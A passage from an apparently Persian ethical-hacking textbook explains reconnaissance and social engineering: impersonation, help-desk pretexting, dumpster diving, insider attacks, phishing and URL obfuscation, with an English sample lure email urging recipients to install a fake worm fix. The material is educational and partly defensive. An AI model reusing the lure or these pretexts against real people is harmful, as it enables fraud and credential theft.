.3 اﺳﺘﺨﺮاج اﻃﻼﻋﺎت DNS .4 ﺟﺴﺘﺠﻮ ﺑﻪ دﻧﺒﺎل اﺳﺎﻣﻲ در وب ﺳﺎﻳﺖ .5 اﺳﺘﺨﺮاج آرﺷﻴﻮ وب ﺳﺎﻳﺖ .6 ﺟﺴﺘﺠﻮ از ﻃﺮﻳﻖ ﮔﻮﮔﻞ ﺑﺮاي اﺧﺒﺎر ﻣﺮﺑﻮط ﺑﻪ ﺷﺮﻛﺖ .7 اﺳﺘﻔﺎده از People Search ﺑﺮاي ﻳﺎﻓﺘﻦ اﻃﻼﻋﺎت ﺷﺨﺼﻲ ﭘﺮﺳﻨﻞ .8 ﻳﺎﻓﺘﻦ ﻣﻜﺎن ﻓﻴﺰﻳﻜﻲ وب ﺳﺮور ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار NeoTracer .9 ﺗﺤﻠﻴﻞ ﺟﺰﺋﻴﺎت زﻳﺮﺳﺎﺧﺖ ﺷﺮﻛﺖ ﺑﺎ اﺳﺘﻔﺎده از ﻓﺮﺻﺖ ﻫﺎي ﺷﻐﻠﻲ .10 ردﻳﺎﺑﻲ اﻳﻤﻴﻞ ﺑﺎ اﺳﺘﻔﺎده از readnotify.com

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، روﺷﻲ ﻏﻴﺮ ﻓﻨﻲ ﺑﺮاي ﺷﻜﺴﺘﻦ اﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ اﺳﺖ . ﻓﺮآﻳﻨﺪ ﮔﻮل زدن ﻛﺎرﺑﺮان ﻳﻚ ﺳﻴﺴﺘﻢ و ﺗﺤﺮﻳﻚ آﻧﻬﺎ ﺑﺮاي دادن اﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺮاي دور زدن ﻣﻜﺎﻧﻴﺰم ﻫﺎي اﻣﻨﻴﺘﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد را ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﻲ ﮔﻮﻳﻨﺪ . داﻧﺴﺘﻦ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﺑﺴﻴﺎر ﻣﻬﻢ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از آن ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﻋﻨﺼﺮ اﻧﺴﺎﻧﻲ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﺪ . اﻳﻦ روش ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺟﻤﻊآ وري اﻃﻼﻋﺎت ﻗﺒﻞ از ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﺷﻮد . .

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﭼﻴﺴﺖ؟

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، اﺳﺘﻔﺎده از ﺗﺮﻏﻴﺐ و ﺗﺤﺮﻳﻚ ﺑﺮاي ﮔﻮل زدن ﻛﺎرﺑﺮان ﺑ ﻪ ﻣﻨﻈﻮر د ﺳﺘﻴﺎﺑﻲ ﺑﻪ اﻃﻼﻋﺎت ﻳﺎ ﺗﺸﻮﻳﻖ ﻗﺮﺑﺎﻧﻲ ﺑﺮاي اﻧﺠﺎم ﺑﺮﺧﻲ ﻋﻤﻠﻴﺎت اﺳﺖ . ﻣﻌﻤﻮﻻ ﻳﻚ ﻣﻬﻨﺪس اﺟﺘﻤﺎع، از ﺗﻠﻔﻦ ﻳﺎ اﻳﻨﺘﺮﻧﺖ ﺑﺮاي ﮔﻮل زدن ﻛﺎرﺑﺮ و ﮔﺮﻓﺘﻦ اﻃﻼﻋﺎت ﺣﺴﺎس ﻳﺎ ﺗﺤﺮﻳﻚ آﻧﻬﺎ ﺑﺮاي اﻧﺠﺎم ﻛﺎرﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎن را ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻧﺪازد اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . در اﻳﻦ روش، ﻣﻬﻨﺪﺳﺎن اﺟﺘﻤﺎﻋﻲ ، ﺑﻪ ﺟﺎي ﺳﻮ اﺳﺘﻔﺎده از ﺣﻔﺮه ﻫﺎي اﻣﻨﻴﺘﻲ ﻛﺎﻣﭙﻴﻮﺗﺮ، از ﮔﺮاﻳﺸﺎت و ﺗﻤﺎﻳﻼت ﻃﺒﻴﻌﻲ اﻓﺮاد ﺑﺮاي اﻳﺠﺎد اﻋﺘﻤﺎد، ﺳﻮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻛﺎرﺑﺮان، ﺿﻌﻴﻒ ﺗﺮﻳﻦ ﻟﻴﻨﻚ ﻫﺎي اﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ . اﻳﻦ اﺻﻞ، دﻟﻴﻞ اﻧﺠﺎم ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ اﺳﺖ . .

ﺧﻄﺮﻧﺎك ﺗﺮﻳﻦ ﺑﺨﺶ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ اﻳﻦ اﺳﺖ ﻛﻪ ﺷﺮﻛﺖ ﻫﺎﻳﻲ ﻛﻪ ﻓﺮآﻳﻨﺪ ﻫﺎي اﺣﺮاز ﻫﻮﻳﺖ، ﻓﺎﻳﺮوال، VPN ، و ﻧﺮم اﻓﺰار ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ ﺷﺒﻜﻪ دارﻧﺪ ، ﻫﻨﻮز ﻣﺴﺘﻌﺪ ﺣﻤﻠﻪ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﻣﻌﻴﺎرﻫﺎي اﻣﻨﻴﺘﻲ را ﺑﻄﻮر ﻣﺴﺘﻘﻴﻢ ﻣﻮرد ﺣﻤﻠﻪ ﻗﺮار ﻧﻤﻲ دﻫﺪ ﺑﻠﻜﻪ آن ر ا دور ﻣﻲ .زﻧﺪ .زﻧﺪ

31

اﻓﺮاد، ﺿﻌﻴﻒ ﺗﺮﻳﻦ ﻟﻴﻨﻚ در زﻧﺠﻴﺮه اﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ و ﺑﻬﺘﺮﻳﻦ روش ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺣﻤﻠﻪ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، داﺷﺘﻦ ﺳﻴﺎﺳﺖ ﻣﻨﺎﺳﺐ و آﻣﻮزش ﭘﺮﺳﻨﻞ اﺳﺖ . ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﺳﺨﺖ ﺗﺮﻳﻦ ﻧﻮع ﺣﻤﻠﻪ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺳﺎزﻣﺎن ﻧﻤﻲ ﺗﻮاﻧﺪ ﺗﻨﻬﺎ ﺑﺎ اﺳﺘﻔﺎده از ﻧﺮم اﻓﺰار و ﺳﺨﺖ اﻓﺰار از ﺑﺮوز آن ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . .

اﻧﻮاع راﻳﺞ ﺣﻤﻼت ﻛﺪاﻣﻨﺪ؟

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ در دو دﺳﺘﻪ ﻗﺮار ﻣﻲ ﮔﻴﺮد : :

ﻣﺒﺘﻨﻲ ﺑﺮ اﻧﺴﺎن: ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ اﻧﺴﺎن، اﺷﺎره ﺑﻪ ﺗﻌﺎﻣﻞ ﺷﺨﺺ ﺑﻪ ﺷﺨﺺ دارد ﺗﺎ اﻃﻼﻋﺎت ﻣﻮرد دﻟﺨﻮاه را ﺑ ﺪﺳﺖ آورد ﻣﺎﻧﻨﺪ ﺗﻤﺎس ﺑﺎ help desk و ﺗﻼش ﺑﺮاي ﻳﺎﻓﺘﻦ ﻛﻠﻤﻪ ﻋﺒﻮر . .

ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ : ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ، اﺷﺎره ﺑﻪ داﺷﺘﻦ ﻧﺮم اﻓﺰار ﻛﺎﻣﭙﻴﻮﺗﺮي اﺳﺖ ﻛﻪ ﺗﻼش ﻛﻨﺪ اﻃﻼﻋﺎت ﻣﻮرد دﻟﺨﻮاه را ﺑﺪﺳﺖ آورد . ﻣﺜﺎﻟﻲ از آن، ارﺳﺎل اﻳﻤﻴﻠﻲ ﺑﻪ ﻛﺎرﺑﺮ و درﺧﻮاﺳﺖ از او ﺑﺮاي ورود ﻣﺠﺪد ﭘﺴﻮرد در ﺻﻔﺤﻪ وب ﺑﺮاي ﺗﺎﺋﻴﺪ اﺳﺖ . اﻳﻦ ﺣﻤﻠﻪ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﺑﺎ ﻧﺎم phishing ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . .

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ اﻧﺴﺎن

ﺣﻤﻼت ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﺑﻪ دﺳﺘﻪ ﻫﺎي ﻛﻠﻲ زﻳﺮ ﺗﻘﺴﻴﻢ ﻣﻲ ﺷﻮﻧﺪ : :

ﺧﻮد را ﺟﺎي ﺷﺨﺺ دﻳﮕﺮي ﺟﺎ زدن ( Impersonating an employee or valid user ): در اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﻫﻜﺮ واﻧﻤﻮد ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻛﺎرﻣﻨﺪ ﻳﺎ ﻛﺎرﺑﺮ ﻗﺎﻧﻮﻧﻲ ﺳﻴﺴﺘﻢ اﺳﺖ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺧﻮد را ﺑﺮاي ﻧﮕﻬﺒﺎن، ﻛﺎرﻣﻨﺪ واﻧﻤﻮد ﻛﻨ ﺪ و دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ دﺳﺖ آورد . ﭘﺲ از داﺧﻞ ﺷﺪن ﻣﻲ ﺗﻮاﻧﺪ اﻃﻼﻋﺎت را از ﺳﻄﻞ زﺑﺎﻟﻪ، ﻣﻴﺰﻫﺎ و ﺳﻴﺴﺘﻢ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي ﺟﻤﻊ آوري ﻛﻨﺪ . .

ﺧﻮد را ﺑﻪ ﻋﻨﻮان ﺷﺨﺺ ﻣﻬﻢ واﻧﻤﻮد ﻛﺮدن ( Posing as an important user ): در اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ، ﻫﻜﺮ ﺧﻮد را ﺟﺎي ﺷﺨﺺ ﻣﻬﻤﻲ ﻫﻤﭽﻮن ﻣﺪﻳﺮ ارﺷﺪ ﺟﺎ ﻣﻲ زﻧﺪ ﻛﻪ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻞ ﻫﺎ ﻳﺎ ﻛﺎﻣﭙﻴﻮﺗﺮ، ﻧﻴﺎز ﺑﻪ ﻛﻤﻚ ﻓﻮري دارد . ﻫﻜﺮ از ﺣﺎﻟﺖ ﺗﺮﺳﺎﻧﺪن اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻛﺎرﻣﻨﺪ ﺳﻄﺢ ﭘﺎﻳﻴﻦ، اﺟﺎزه دﺳﺘﺮﺳﻲ ﺑ ﻪ ﺳﻴﺴﺘﻢ را ﺑﺪﻫﺪ . ﺑﺴﻴﺎري از ﻛﺎرﻛﻨﺎن ﺳﻄﺢ ﭘﺎﻳﻴﻦ، از ﻛﺴﻲ ﻛﻪ ﻓﻜﺮ ﻣﻲ ﻛﻨﻨﺪ ﻣﺪﻳﺮ ارﺷﺪ اﺳﺖ، ﺳﻮاﻟﻲ ﻧﻤﻲ ﭘﺮﺳﻨﺪ . .

اﺳﺘﻔﺎده از ﺷﺨﺺ ﺳﻮم ( Using a third person ): در اﻳﻦ روﻳﻜﺮد، ﻫﻜﺮ واﻧﻤﻮد ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﺠﻮز اﺳﺘﻔﺎده از ﻣﻨﺎﺑﻊ ﻣﺠﺎز ﺳﻴﺴﺘﻢ را دارد . زﻣﺎﻧﻴﻜﻪ ﻣﻨﺒﻊ داراي ﻣﺠﻮز، ﺧﺎﻟﻲ اﺳﺖ ﻳﺎ ﻧﻤﻲ ﺗﻮاﻧﺪ ﻗﺎﺑﻞ دﺳﺘﺮﺳﻲ ﺑﺎﺷﺪ، اﻳﻦ ﺣﻤﻠﻪ، ﺑﺴﻴﺎر ﻣﻮﺛﺮ اﺳﺖ . .

32

ﺗﻤﺎس ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ( Calling technical support ): ﺗﻤﺎس ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﺑﺮاي راﻫﻨﻤﺎﻳﻲ، ﻧﻮع ﻛﻼﺳﻴﻚ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ اﺳﺖ . ﭘﺮﺳﻨﻞ help desk و ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ، آﻣﻮزش دﻳﺪه اﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎرﺑﺮان ﻛﻤﻚ ﻛﻨﻨﺪ . ﻫﻤﻴﻦ اﻣﺮ ﺳﺒﺐ ﺷﻜﺎر آﻧﻬﺎ ﺗﻮﺳﻂ ﺣﻤﻼت ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﻲ ﺷﻮد . .

اﻳﺴﺘﺎدن ﻛﻨﺎر ﻛﺎرﺑﺮ ( Shoulder surfing ): ﺗﻜﻨﻴﻚ ﺟﻤﻊ آوري ﭘﺴﻮرد اﺳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻮﻗﻊ ورود ﻛﺎرﺑ ﺮ ﺑﻪ ﺳﻴﺴﺘﻢ، ﻛﻨﺎرش ﻣﻲ اﻳﺴﺘﺪ و ﻧﺎ م ﻛﺎرﺑﺮي و ﻛﻠﻤﻪ ﻋﺒﻮري ﻛﻪ وارد ﺳﻴﺴﺘﻢ ﻣﻲ ﻛﻨ ﺪ را ﻣﻲ ﺑﻴﻨﺪ . .

آﺷﻐﺎل ﮔﺮدي ( Dumpster diving ): ﺟﺴﺘﺠﻮ در زﺑﺎﻟﻪ ﻫﺎ ﺑﺮاي ﻳﺎﻓﺘﻦ اﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﺑﺮ روي ﻛﺎﻏﺬ ﻧﻮﺷﺘﻪ ﺷﺪه ﺑﺎﺷﺪ، اﺳﺖ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﭘﺴﻮردﻫﺎ، ﻧﺎم ﻓﺎﻳﻞ ﻫﺎ، ﻳﺎ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ دﻳﮕﺮي را ﺑﺪﺳﺖ آورد . .

ﻳﻜﻲ از روش ﻫﺎي ﭘﻴﺸﺮﻓﺘﻪ ﺑﺮاي دﺳﺘﻴﺎﺑﻲ ﺑﻪ اﻃﻼﻋﺎت ﻏﻴﺮ ﻣﺠﺎز، ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﻌﻜﻮس اﺳﺖ . ﺑﺎ اﺳﺘﻔﺎده از ا ﻳﻦ ﺗﻜﻨﻴﻚ، ﻫﻜﺮ ﺷﺨﺼﻴ ﺘﻲ اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻲ رﺳﺪ داراي اﺧﺘﻴﺎر اﺳﺖ ﺑﻨﺎﺑﺮاﻳﻦ، ﻛﺎرﻣﻨﺪان، از ﻫﻜﺮ اﻃﻼﻋﺎت ﻣﻲ ﺧﻮاﻫﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﻫﻜﺮ ﺧﻮد را ﺟﺎي help desk ﺟﺎ ﻣﻲ زﻧﺪ و ﻧﺎم ﻛﺎرﺑﺮي ﺷﺨﺺ را ﻣﻲ ﮔﻴﺮد ﺗﺎ ﺑﻪ او ﭘﺴﻮرد دﻫﺪ . .

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ

ﺣﻤﻼت ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺷﺎﻣﻞ ﻣﻮارد زﻳﺮ ﻣﻲ ﺷﻮد : :

• ﺿﻤﻴﻤﻪ ﻫﺎي اﻳﻤﻴﻞ • وب ﺳﺎﻳﺖ ﻫﺎي ﺟﻌﻠﻲ • ﭘﻨﺠﺮه ﻫﺎي Popup

ﺣﻤﻼت داﺧﻠﻲ

اﮔﺮ ﻫﻜﺮ ﻧﺘﻮاﻧﺪ ﻫﻴﭻ روﺷﻲ ﺑﺮاي ﻫﻚ ﺳﺎزﻣﺎن ﭘﻴﺪا ﻛﻨﺪ، ﺑﻬﺘﺮﻳﻦ ﮔﺰﻳﻨﻪ ﺑﻌﺪي، ﻧﻔﻮذ ﺑﻪ ﺳﺎزﻣﺎن ﺑﻪ ﻋ ﻨﻮان ﻛﺎرﻣﻨﺪ ﻳﺎ ﭘﻴﺪا ﻛﺮدن ﻛﺎرﻣﻨﺪ ﻧﺎراﺿﻲ اﺳﺖ ﻛﻪ ﺑﺘﻮاﻧ ﺪ از ﻃﺮﻳﻖ او ﺣﻤﻠﻪ را اﻧﺠﺎم د ﺪﻫ . ﺣﻤﻼت داﺧﻠﻲ، ﻗﺪرﺗﻤﻨﺪ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻛﺎرﻣﻨﺪان، دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ دارﻧﺪ . .

ﺣﻤﻼت Phishing

ﺣﻤﻼﺗﻲ ﻛﻪ اﻳﻤﻴﻠ ﻲ را ارﺳﺎل ﻣﻲ ﻛﻨﻨﺪ و ﻣﻌﻤﻮﻻ ﺧﻮد را ﺟﺎي ﺑﺎﻧﻚ ﻳﺎ ﺷﺮﻛﺖ ﻛﺎرت اﻋﺘﺒﺎري ﻳﺎ ﻣﻮﺳﺴﺎت ﻣﺎﻟﻲ ﺟﺎ ﻣﻲ زﻧﻨﺪ و از آﻧﻬﺎ ﻣﻲ ﺧﻮاﻫﻨﺪ ﻛﻪ اﻃﻼﻋﺎت ﺑﺎﻧﻜﻲ ﺷﺎن را ﺗﺎﺋﻴﺪ ﻛﻨﻨﺪ ﻳﺎ ﭘﺴﻮردﺷﺎن ﻳﺎ PIN را دوﺑﺎره وارد ﻛﻨﻨﺪ . ﻛﺎرﺑﺮ روي

33

ﻟﻴﻨﻜﻲ ﻛﻪ در اﻳﻤﻴﻞ اﺳﺖ ﻛﻠﻴﻚ ﻣﻲ ﻛﻨﺪ وﻟﻲ ﺑﻪ ﻳﻚ وب ﺳﺎﻳﺖ ﺳﺎﺧﺘﮕﻲ اﻧﺘﻘﺎل ﻣﻲ ﻳﺎﺑﺪ . ﺳﭙﺲ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ اﻳﻦ اﻃﻼﻋﺎت را ﺑﺪﺳﺖ آورد و از آﻧﻬﺎ ﺑﺮاي دﺳﺘﺮﺳﻲ ﻫﺎي ﻣﺎﻟﻲ ﻳﺎ ﺣﻤﻼت دﻳﮕﺮ اﺳﺘﻔﺎده ﻛﻨﺪ . اﻳﻤﻴﻞ ﻫﺎﻳﻲ ﻛﻪ در آﻧﻬﺎ ﮔﻔﺘﻪ ﻣﻲ ﺷﻮد ﻣﻘﺪار زﻳﺎدي ﭘﻮل ﺑﺮﻧﺪه ﺷﺪه اﻳﺪ ﻧﻴﺰ ﻣﺜﺎﻟﻲ از ﺣﻤﻼت phishing اﺳﺖ . اﻳﻦ ﺣﻤﻼت، ﻫﻤﺎن ﺷﺨﺺ را ﻣﻮرد ﻫﺪف ﻗﺮار ﻣﻲ دﻫﻨﺪ و ﻣﻲ ﺧﻮاﻫﻨﺪ ﻛﻪ اﻃﻼﻋﺎت ﻣﺤﺮﻣﺎﻧﻪ را در اﺧﺘﻴﺎر ﻫﻜﺮ ﻗﺮار دﻫ .ﺪﻨ .ﺪﻨ

ﺿﻤﻴﻤﻪ ﻫﺎي اﻳﻤﻴﻞ ﻣﻲ ﻧﺗﻮا ﻨﺪ ﺑﺮاي ارﺳﺎل ﻛﺪﻫﺎي ﻣﺨﺮب ﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ اﺳﺘﻔﺎده ﺷﻮﻧ ﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ، اﺑﺰارﻫﺎﻳﻲ ﻣﺜﻞ keylogger ﻧﺮم اﻓﺰاري ﻧﺼﺐ ﻛﻨﻨﺪ ﺗﺎ ﭘﺴﻮرد را ﺑﺪﺳﺖ آور ﺪﻧ . وﻳﺮوس ﻫﺎ، ﺗﺮوﺟﺎن ﻫﺎ و worm ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ در اﻳﻤﻴﻞ ﻫﺎي ﺗﻘﻠﺒﻲ ﺑﺮاي اﻏﻔﺎل ﻗﺮﺑﺎﻧﻲ ﺑﺮاي ﺑﺎز ﻛﺮدن ﺿﻤﻴﻤﻪ ﺑﺎﺷﻨﺪ . ﺿﻤﻴﻤﻪ ﻫﺎي اﻳﻤﻴﻞ، ﺑﻪ ﻋﻨﻮان ﺣﻤﻼت ﻣﻬﻨ ﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﺴﺘﻨﺪ . .

ﻣﺜﺎﻟﻲ از اﻳﻤﻴﻠﻲ ﻛﻪ ﺳﻌﻲ ﻣﻲ ﻛﻨﺪ درﻳﺎﻓﺖ ﻛﻨﻨﺪه، ﺿﻤﻴﻤﻪ را ﺑﺎز ﻛﻨﺪ ﺑﻪ ﺷﻜﻞ زﻳﺮ اﺳﺖ : :

Mail server report.

Our firewall determined the e-mails containing worm copies are being sent from your computer. Nowadays it happens from many computers, because this is a new virus type (Network Worms).

Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses

Please install updates for worm elimination and your computer restoring.

Best regards,

Customer support service

ﭘﻨﺠﺮه ﻫﺎي Pop-up ﻧﻴﺰ ﻣﺜﻞ ﺿﻤﻴﻤﻪ ﻫﺎي اﻳﻤﻴﻞ، ﻣﻲ ﺗﻮاﻧﻨﺪ در ﺣﻤﻼت ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﭘﻨﺠﺮه ﻫﺎي Pop-up ﻛﻪ ﭘﻴﺸﻨﻬﺎدات ﺧﺎﺻﻲ را دارﻧﺪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﻛﺎرﺑﺮ را ﺗﺸﻮﻳﻖ ﻛﻨﻨﺪ ﺗﺎ ﻧﺮم اﻓﺰار ﻣﺨﺮب را ﻧﺼﺐ ﻛﻨﺪ . .

URL obfuscation

ﻣﻌﻤﻮﻻ URL در ﻗﺴﻤﺖ ﻧﻮار آدرس ﻣﺮورﮔﺮ اﻳﻨﺘﺮﻧﺘﻲ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ وب ﺳﺎﻳﺖ ﺧﺎﺻﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . URL obfuscation ، ﻣﺨﻔﻲ ﻛﺮدن ﻳﺎ ﺟﻌﻠﻲ ﻛﺮدن URL اﺳﺖ ﺗﺎ ﻗﺎﻧﻮﻧﻲ ﺑﻪ ﻧﻈﺮ ﺑﺮﺳﺪ . ﺑﺮاي ﻣﺜﺎل، وب ﺳﺎﻳﺖ Citibank/204.13.144.2 ، ﺑﻪ ﻧﻈﺮ ﻣﻲ رﺳﺪ ﻛﻪ آدرس اﻳﻨﺘﺮﻧﺘﻲ ﺻﺤﻴﺢ ﺑﺮاي Citibank ﻣﻲ ﺑﺎﺷﺪ وﻟﻲ اﻳﻨﻄﻮر ﻧﻴﺴﺖ . URL obfuscation ، ﺑﺮاي ﺣﻤﻼت phishing و ﺑﻌﻀﻲ از ﻛﻼﻫﺒﺮداري ﻫﺎي آﻧﻼﻳﻦ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﺗﺎ ﻛﻼﻫﺒﺮداري را

34

ﻋﻤﻠﻲ ﻗﺎﻧﻮﻧﻲ ﻧﺸﺎن دﻫﺪ . ﻣﻤﻜﻦ اﺳﺖ آدرس وب ﺳﺎﻳﺖ، ﺑﺎ ﻧﺎم ﻳﺎ ﻟﻮﮔﻮي ﻣﻮﺳﺴﻪ ﻣﺎﻟﻲ واﻗﻌﻲ ﺑﻪ ﻧﻈﺮ ﺑﺮﺳﺪ اﻣﺎ ﻳﻚ وب ﺳﺎﻳﺖ ﺳﺎﺧﺘﮕﻲ ﺑﺎﺷﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﺎرﺑﺮي ﺑﺮ روي ﻟﻴﻨﻚ ﻛﻠﻴﻚ ﻣﻲ ﻛﻨﺪ، ﺑﻪ ﺳﺎﻳﺖ ﻫﻜﺮ ﺗﻐﻴﻴﺮ ﻣﺴﻴﺮ داده ﻣﻲ ﺷﻮﻧﺪ . آدرس ﻫﺎﻳﻲ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ در ﻟﻴﻨﻚ ﻫﺎي ﺟﻌﻠﻲ ﻗﺮار ﺑﮕﻴﺮﻧﺪ، از ﻋﻼﺋﻢ دﻫﺪﻫ ﻲ ﻳﺎ ﺷﺎﻧﺰدﻫﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﺑﺮاي ﻣﺜﺎل، آدرس 192.168.10.5 ، ﺷﺒﻴﻪ 3232238085 ﺧﻮاﻫﺪ ﺑﻮد . .

ﭘﻴﺸﮕﻴﺮي از ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ

ﺳﻴﺎﺳ ﺖ ﻫﺎي اﻣﻨﻴﺘﻲ ﻣﺴﺘﻨﺪ ﺷﺪه و اﺟﺒﺎري، ﺣﻴﺎﺗﻲ ﺗﺮﻳﻦ ﻋﻨﺼﺮ در ﺑﺮﻧﺎﻣﻪ اﻣﻨﻴﺖ اﻃﻼﻋﺎت ﻫﺴﺘﻨﺪ . اﮔﺮ ﻛﺎرﻣﻨﺪان، آﻣﻮ زش ﻧﺪﻳﺪه ﺑﺎﺷﻨﺪ ، ﺳﻴﺎﺳﺖ ﻫﺎ و ﻓﺮآﻳﻨﺪ ﻫﺎي ﺧﻮب ، ﻣﻮﺛﺮ ﻧﺨﻮاﻫﻨﺪ ﺑﻮد . اﻳﻦ ﺳﻴﺎﺳﺖ ﻫﺎ ﺑﺎﻳﺴﺘﻲ ﻛﻪ اﺑﺘﺪا ﺑﺎ ﻛﺎرﻣﻨﺪان ﻣﺸﻮرت ﺷﻮد و ﺳﭙﺲ ﺗﻮﺳﻂ ﻣﺪﻳﺮ، اﺟﺒﺎر ﺷﻮد . ﺳﻴﺎﺳﺖ اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎﻧﻲ ﺑﺎﻳﺪ ﻣﺸﺨﺺ ﻛﻨﻨﺪ ﻛﻪ ﭼﮕﻮﻧﻪ و ﭼﻪ زﻣﺎﻧﻲ اﻛﺎﻧﺖ ﻫﺎ اﻳﺠﺎد و ﭘﺎﻳﺎن ﻳﺎﺑﻨﺪ، ﻫﺮ ﭼﻨﺪ وﻗﺖ ﺑﻪ ﻳﻜﺒﺎر ﺑﺎﻳﺪ ﭘﺴﻮردﻫﺎ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ، ﭼﻪ ﻛﺴﻲ ﻣﻲ 